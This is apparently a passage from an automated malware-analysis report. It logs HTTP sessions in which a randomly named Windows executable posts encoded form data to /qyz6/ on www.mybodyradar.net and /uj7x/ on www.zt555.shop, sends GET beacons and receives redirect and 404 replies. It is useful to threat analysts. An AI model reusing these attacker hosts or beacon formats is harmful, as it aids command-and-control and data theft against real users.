                                                                                                        Data Ascii: Sh=RMX2YwK9YBtUiTOV2912felhFrmZ35PZhC26Gchp617JLDUbOpnoVCqwFtHubtEeL+Li47AQUdw2lTugWoUj0RV5Refl6bj3i0RtZc5uOUI//xkHehDaMCHMdA1xvQB0zKu1cycCPyfpmmZ0jdGf2fHe3KCQgUrrGEcZwmkpiT0E+ff0+GITJQH095HtI2pIFg==


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        34192.168.2.4500383.33.130.190805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:48:13.069466114 CEST777OUTPOST /qyz6/ HTTP/1.1
                                                                                                        Host: www.mybodyradar.net
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.mybodyradar.net
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.mybodyradar.net/qyz6/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 52 4d 58 32 59 77 4b 39 59 42 74 55 67 7a 65 56 37 36 70 32 4f 2b 6c 69 63 72 6d 5a 6c 35 50 64 68 43 71 36 47 64 55 79 36 47 50 4a 4c 6d 34 62 50 6f 6e 6f 53 43 71 77 4b 4e 48 68 56 4e 45 56 4c 2b 48 41 34 36 38 51 55 64 30 32 6c 52 47 67 57 5a 55 73 31 42 56 6e 5a 2b 66 72 6c 4c 6a 33 69 30 52 74 5a 63 74 55 4f 55 41 2f 2b 45 73 48 52 6b 6a 64 50 43 48 44 63 41 31 78 2b 67 42 77 7a 4b 75 48 63 33 39 70 50 78 6e 70 6d 6a 6c 30 6a 4d 47 63 34 66 48 59 35 71 44 6c 6d 58 79 46 48 6b 56 52 2f 33 67 56 38 43 77 72 2f 5a 4f 75 76 33 70 45 62 51 6a 48 67 2b 4f 5a 46 31 55 42 65 69 72 66 4c 6a 6b 47 66 79 30 65 55 6b 74 46 2b 50 63 65 38 44 55 3d
                                                                                                        Data Ascii: Sh=RMX2YwK9YBtUgzeV76p2O+licrmZl5PdhCq6GdUy6GPJLm4bPonoSCqwKNHhVNEVL+HA468QUd02lRGgWZUs1BVnZ+frlLj3i0RtZctUOUA/+EsHRkjdPCHDcA1x+gBwzKuHc39pPxnpmjl0jMGc4fHY5qDlmXyFHkVR/3gV8Cwr/ZOuv3pEbQjHg+OZF1UBeirfLjkGfy0eUktF+Pce8DU=


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        35192.168.2.4500393.33.130.190805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:48:15.612699986 CEST10859OUTPOST /qyz6/ HTTP/1.1
                                                                                                        Host: www.mybodyradar.net
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.mybodyradar.net
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.mybodyradar.net/qyz6/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 52 4d 58 32 59 77 4b 39 59 42 74 55 67 7a 65 56 37 36 70 32 4f 2b 6c 69 63 72 6d 5a 6c 35 50 64 68 43 71 36 47 64 55 79 36 47 58 4a 4d 51 73 62 4f 4c 50 6f 54 43 71 77 44 74 47 6d 56 4e 45 55 4c 2b 66 45 34 36 78 6e 55 66 63 32 6e 79 2b 67 51 74 41 73 73 52 56 6e 56 65 66 71 36 62 69 6a 69 30 68 70 5a 63 39 55 4f 55 41 2f 2b 44 63 48 59 52 44 64 4a 43 48 4d 64 41 31 48 76 51 42 55 7a 4b 6d 58 63 33 78 66 50 41 48 70 6d 44 56 30 68 2b 75 63 77 66 48 61 36 71 44 39 6d 58 4f 47 48 6b 4a 33 2f 33 55 37 38 43 45 72 39 4e 57 33 34 47 78 59 46 42 4c 43 37 39 53 66 63 33 55 54 42 79 69 69 43 47 41 67 4b 47 6b 76 52 6c 45 69 75 66 4d 76 6e 54 58 67 77 6e 32 4f 30 4f 79 51 39 49 78 35 31 35 61 6b 6f 74 33 50 54 41 74 77 5a 6f 30 61 73 66 4e 64 6a 35 30 58 4a 30 2f 43 73 6e 31 44 34 44 50 39 33 56 35 61 43 55 75 31 6b 43 49 4b 74 74 79 65 48 46 53 51 64 4b 2f 66 52 69 73 55 2f 2f 6f 36 70 72 42 36 63 6f 79 4d 6a 56 52 30 68 63 46 35 75 65 76 59 65 62 39 61 57 6a 30 71 58 6f 54 30 58 59 5a 7a 52 72 54 [TRUNCATED]
                                                                                                        Data Ascii: Sh=RMX2YwK9YBtUgzeV76p2O+licrmZl5PdhCq6GdUy6GXJMQsbOLPoTCqwDtGmVNEUL+fE46xnUfc2ny+gQtAssRVnVefq6biji0hpZc9UOUA/+DcHYRDdJCHMdA1HvQBUzKmXc3xfPAHpmDV0h+ucwfHa6qD9mXOGHkJ3/3U78CEr9NW34GxYFBLC79Sfc3UTByiiCGAgKGkvRlEiufMvnTXgwn2O0OyQ9Ix515akot3PTAtwZo0asfNdj50XJ0/Csn1D4DP93V5aCUu1kCIKttyeHFSQdK/fRisU//o6prB6coyMjVR0hcF5uevYeb9aWj0qXoT0XYZzRrTRnWYB5VysD+YbebDwYR8k1mKnTaLuBXyNfyjvFYz7MB2ezn+YDKUx0EAqGexdLMg4HzhJB8s+fMDF+bFmqJyZPuc1S7CaGtzAYX8XJeY+/80wt+WNM+yyS8mfpR7IXpsx8ZFbdvO1kKcZVb7+O+NneHRqg2BkRYnEIwSx+bbBGrNVtI2xUJe6TGEbLPEknLRffMBegcS2OdbZ6aYIUjupYGHeOIx0r4zFfpIE/GEpzBefyx+G9aA+z0bikBlPiRx9wikz3ZFKYYFxvoNVRwwZfNvDRpzWh8u6Oz/vwoOl+UHMyHvH2SPvWoDrvf44pLKRTi4s1YaInrOIVy+4tpai1Qt5OqHde32RTp1kPQrfk6mJc3SpZUI39+92zubheWdBiVHccenKxbok3R3WKfjvj13envL+BIlLVrGPokzW4pJvZKzw/pqA2jPksQSojt54hkp3XKKNkdc6hdc2GsdwuB0Wfg1RdZHS6PGrPs1UuwISxNeiE61wWxEXkNIidOYyNMdOPgTMlmrNguHaSUbCVDpUhORQLEFFvTMCW0NLMKZb3oAOJ5YI2Kq4D1iGBxh0d2XoegT9D9n6M/4Pl0t3Dp5vPYilySL3fjJ+xgu6lCFv6YlDJ36+TQKqXzldu+cHJbUD67WB9eApTlSzb/PkIXZyS1X0ijkga [TRUNCATED]


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        36192.168.2.4500403.33.130.190805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:48:18.155544996 CEST488OUTGET /qyz6/?Sh=cO/WbHS7dDlPjWOw24pePOdtBvzI7qrstwS5E88tqn3GEGw6O6zMXAiSEd+QRtw+ArL2+ZdGEPoP/wr/W49OxjdcbcDVqf77kjZAc/w1Hn9qnxIMaTPUER4=&f6SpQ=_n84nZ4HGta HTTP/1.1
                                                                                                        Host: www.mybodyradar.net
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Oct 10, 2024 14:48:18.608920097 CEST396INHTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Thu, 10 Oct 2024 12:48:18 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 256
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 53 68 3d 63 4f 2f 57 62 48 53 37 64 44 6c 50 6a 57 4f 77 32 34 70 65 50 4f 64 74 42 76 7a 49 37 71 72 73 74 77 53 35 45 38 38 74 71 6e 33 47 45 47 77 36 4f 36 7a 4d 58 41 69 53 45 64 2b 51 52 74 77 2b 41 72 4c 32 2b 5a 64 47 45 50 6f 50 2f 77 72 2f 57 34 39 4f 78 6a 64 63 62 63 44 56 71 66 37 37 6b 6a 5a 41 63 2f 77 31 48 6e 39 71 6e 78 49 4d 61 54 50 55 45 52 34 3d 26 66 36 53 70 51 3d 5f 6e 38 34 6e 5a 34 48 47 74 61 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Sh=cO/WbHS7dDlPjWOw24pePOdtBvzI7qrstwS5E88tqn3GEGw6O6zMXAiSEd+QRtw+ArL2+ZdGEPoP/wr/W49OxjdcbcDVqf77kjZAc/w1Hn9qnxIMaTPUER4=&f6SpQ=_n84nZ4HGta"}</script></head></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        37192.168.2.451587118.99.50.8805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:48:24.678086996 CEST742OUTPOST /uj7x/ HTTP/1.1
                                                                                                        Host: www.zt555.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.zt555.shop
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.zt555.shop/uj7x/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 78 71 54 76 42 52 4d 49 37 57 72 4c 57 39 50 64 79 57 47 4f 38 39 51 6e 73 37 2f 7a 5a 41 52 30 36 44 2b 61 62 79 6a 4b 70 58 66 6b 77 5a 5a 46 76 51 56 69 56 38 58 4e 75 4c 77 6d 70 4a 6f 6c 46 6f 39 4d 35 59 58 43 59 69 65 4e 66 4d 36 53 4f 49 62 69 61 44 63 6a 58 50 49 33 7a 4f 47 62 71 78 79 32 65 64 2f 63 49 41 51 2b 74 62 4b 41 68 7a 45 79 7a 34 79 50 49 58 4f 6b 63 76 74 6e 71 4f 46 79 50 63 35 6c 66 31 57 69 77 79 43 59 75 64 78 6b 68 57 36 4b 70 45 79 51 74 4f 6a 4a 63 2f 62 50 73 30 37 30 6d 75 53 41 49 43 46 49 52 43 39 4e 6f 39 42 6c 73 54 52 79 59 79 51 4e 65 51 3d 3d
                                                                                                        Data Ascii: Sh=xqTvBRMI7WrLW9PdyWGO89Qns7/zZAR06D+abyjKpXfkwZZFvQViV8XNuLwmpJolFo9M5YXCYieNfM6SOIbiaDcjXPI3zOGbqxy2ed/cIAQ+tbKAhzEyz4yPIXOkcvtnqOFyPc5lf1WiwyCYudxkhW6KpEyQtOjJc/bPs070muSAICFIRC9No9BlsTRyYyQNeQ==
                                                                                                        Oct 10, 2024 14:48:25.616406918 CEST691INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Thu, 10 Oct 2024 12:48:25 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 548
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        38192.168.2.451588118.99.50.8805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:48:27.224622965 CEST762OUTPOST /uj7x/ HTTP/1.1
                                                                                                        Host: www.zt555.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.zt555.shop
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.zt555.shop/uj7x/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 78 71 54 76 42 52 4d 49 37 57 72 4c 58 64 2f 64 68 31 2b 4f 73 74 51 34 6a 62 2f 7a 51 67 52 77 36 44 79 61 62 7a 6e 6b 70 45 33 6b 77 34 70 46 39 56 68 69 53 38 58 4e 36 37 78 74 6e 70 6f 71 46 6f 78 45 35 59 72 43 59 68 69 4e 66 4f 69 53 4e 2f 50 74 56 7a 63 68 66 76 49 35 33 4f 47 62 71 78 79 32 65 65 44 79 49 45 30 2b 73 72 61 41 67 58 51 7a 74 49 79 49 4a 58 4f 6b 4b 66 74 6a 71 4f 46 4d 50 59 68 50 66 32 75 69 77 77 61 59 74 4d 78 6e 30 6d 36 32 33 45 7a 5a 38 63 69 62 43 4f 7a 46 6c 6b 76 62 74 64 75 48 41 6b 55 53 41 7a 63 61 36 39 6c 57 78 55 59 47 56 78 74 45 46 5a 72 6f 62 75 4a 4b 67 77 67 72 42 38 6a 42 37 44 48 79 74 79 63 3d
                                                                                                        Data Ascii: Sh=xqTvBRMI7WrLXd/dh1+OstQ4jb/zQgRw6DyabznkpE3kw4pF9VhiS8XN67xtnpoqFoxE5YrCYhiNfOiSN/PtVzchfvI53OGbqxy2eeDyIE0+sraAgXQztIyIJXOkKftjqOFMPYhPf2uiwwaYtMxn0m623EzZ8cibCOzFlkvbtduHAkUSAzca69lWxUYGVxtEFZrobuJKgwgrB8jB7DHytyc=
                                                                                                        Oct 10, 2024 14:48:28.080588102 CEST691INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Thu, 10 Oct 2024 12:48:27 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 548
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        39192.168.2.451589118.99.50.8805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:48:29.777321100 CEST10844OUTPOST /uj7x/ HTTP/1.1
                                                                                                        Host: www.zt555.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.zt555.shop
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.zt555.shop/uj7x/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 78 71 54 76 42 52 4d 49 37 57 72 4c 58 64 2f 64 68 31 2b 4f 73 74 51 34 6a 62 2f 7a 51 67 52 77 36 44 79 61 62 7a 6e 6b 70 45 76 6b 77 4f 39 46 2b 79 39 69 54 38 58 4e 35 37 77 71 6e 70 6f 4e 46 6f 70 36 35 59 6e 34 59 6e 75 4e 51 4e 71 53 61 39 33 74 43 6a 63 68 64 76 49 30 7a 4f 47 4f 71 78 44 2b 65 65 54 79 49 45 30 2b 73 75 65 41 6e 44 45 7a 76 49 79 50 49 58 4f 53 63 76 73 45 71 4f 63 33 50 59 74 31 66 47 4f 69 70 51 4b 59 73 2b 4a 6e 32 47 36 77 79 45 7a 42 38 63 76 46 43 4f 75 36 6c 6b 62 78 74 61 47 48 43 6a 30 4d 45 6e 63 35 35 2b 35 30 71 57 6f 65 51 68 35 6e 4c 70 66 48 57 66 70 56 34 7a 49 43 48 4b 32 6f 76 41 44 6c 32 6d 6d 73 44 54 46 49 79 43 2b 4d 31 76 4b 55 55 4e 75 79 47 48 53 74 46 6f 72 68 59 4b 35 2f 50 4e 7a 4a 63 53 6b 4e 46 4c 49 6a 42 2b 76 77 4e 49 50 45 2f 57 57 41 32 67 53 62 48 6c 30 79 39 71 35 71 45 4e 63 39 4b 48 2b 6b 37 64 31 71 67 52 52 62 39 6a 58 51 30 79 65 74 55 4b 78 50 57 5a 4d 68 59 73 55 52 77 6b 7a 35 2b 48 45 63 58 55 45 39 65 7a 59 4a 6d 4a 78 [TRUNCATED]
                                                                                                        Data Ascii: Sh=xqTvBRMI7WrLXd/dh1+OstQ4jb/zQgRw6DyabznkpEvkwO9F+y9iT8XN57wqnpoNFop65Yn4YnuNQNqSa93tCjchdvI0zOGOqxD+eeTyIE0+sueAnDEzvIyPIXOScvsEqOc3PYt1fGOipQKYs+Jn2G6wyEzB8cvFCOu6lkbxtaGHCj0MEnc55+50qWoeQh5nLpfHWfpV4zICHK2ovADl2mmsDTFIyC+M1vKUUNuyGHStForhYK5/PNzJcSkNFLIjB+vwNIPE/WWA2gSbHl0y9q5qENc9KH+k7d1qgRRb9jXQ0yetUKxPWZMhYsURwkz5+HEcXUE9ezYJmJxKdUqenjaIzsu+Lo8s9zdKUpImwk/FWnIVR804ZogkZXGa+DtGNUMrgscG7K8m9o3uskuRxZ/Ul/+Zk/JNmy45IAJ974o/OPp0aO37OtbN2ZqfkbTD+ZVL4P91nVJ04rDfaTAoD4j3+Ujji2qSkJRYfK5CA9YYEYtV4IVbz41M3lXkrV2OsUCQSwFjcEAmo7d4HTRWP8Ttog8EI/xrS78j+9r4nPMgjdoPHJFaqs4/DQYt8qFmhxcCHpJA+96btlmoWk5Km9NKgUpIZISZAUaxybcKtPQXec6t2X9JikXHAqNYZIDZEObK1FVKJqP8xc+XS21i8N+D6pC641gtXxWRrPNR2Xq/c/DCj++Mam3kxqzAKT7A3t/FB0ZYszd3URzg3kGWuSWN8y/yiCF7bg+DxJMpk3p7US8BCrQAOmdU8T08Krj1I7S3u67v5+s2g5C743g1NRQ01itE360xHn1cZVXmWgezPggBUaqFOD+a2bw8NfzGbrmoL7r3a6LKhURR9Sf2qLWh05CVU8SRH4MOk9kUU5hFTp755rSkGP507PRO+tvdKaZRbwI9ijTTLXXOtOdsilzaywU4QzVuO4ki5BNIvwncSu/rAgZdxlhQ7Hri9MEn/FUzQRkOZ+DJRQLJPpmGHpyD/LA+S4ufciM0inf2dF1gW2yyj [TRUNCATED]
                                                                                                        Oct 10, 2024 14:48:30.686443090 CEST691INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Thu, 10 Oct 2024 12:48:30 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 548
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        40192.168.2.451590118.99.50.8805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:48:32.314378977 CEST483OUTGET /uj7x/?f6SpQ=_n84nZ4HGta&Sh=8o7PCltX/VPHe/nsrm2GraoW3Ln6cTBZ+TiwGxPZp0XU3O8CthtWROn8w6ZbnbkTCMdEyZnAfiGuFPjlC9agdmB/YOAJ3uSjrm6gafSyJ19b8vSngBVuvZk= HTTP/1.1
                                                                                                        Host: www.zt555.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Oct 10, 2024 14:48:33.197685003 CEST691INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Thu, 10 Oct 2024 12:48:33 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 548
                                                                                                        Connection: close
